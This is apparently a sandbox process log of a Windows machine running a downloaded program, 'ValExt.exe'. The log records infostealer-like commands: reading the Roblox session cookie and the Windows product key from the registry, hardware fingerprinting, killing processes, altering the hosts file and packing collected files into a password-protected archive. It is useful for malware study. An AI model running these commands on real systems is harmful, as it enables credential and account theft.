IALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z4rinlpt\z4rinlpt.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4188"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9B8.tmp" "c:\Users\Admin\AppData\Local\Temp\z4rinlpt\CSC5687CD8A6CB84948851EFB9D9BB7252.TMP"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4188
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2804"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2804
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2468"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2468
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3324"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4188"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3324
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4188
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1416"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2804"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1416
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2804
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3640"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3640
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2468"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1324"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2468
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1324
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3324"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5636"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3324
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5636
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1416"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1416
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3800"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3640"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3800
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3640
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5612"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1324"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5612
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1324
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4268"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5636"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4268
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5636
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3800"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3800
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5612"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5612
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4268"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4268
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI56962\rar.exe a -r -hp"HRVST" "C:\Users\Admin\AppData\Local\Temp\cjDbZ.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI56962\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI56962\rar.exe a -r -hp"HRVST" "C:\Users\Admin\AppData\Local\Temp\cjDbZ.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Users\Admin\Downloads\ValExt.exe
"C:\Users\Admin\Downloads\ValExt.exe"
C:\Users\Admin\Downloads\ValExt.exe
"C:\Users\Admin\Downloads\ValExt.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaf3dc46f8,0x7ffaf3dc4708,0x7ffaf3dc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5996 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6020 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1076 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2400 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3096 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1800 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5784 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x41c 0x4f4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1788 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Perm Spoof\Checker.bat" "
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get serialnumber
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get serialnumber
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET PNPDeviceID
C:\Windows\System32\Wbem\WMIC.exe
wmic desktopmonitor get pnpdeviceid
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\ipconfig.exe
ipconfig
C:\Windows\system32\cmd.exe
cmd /k
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6540 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4188 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4328 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
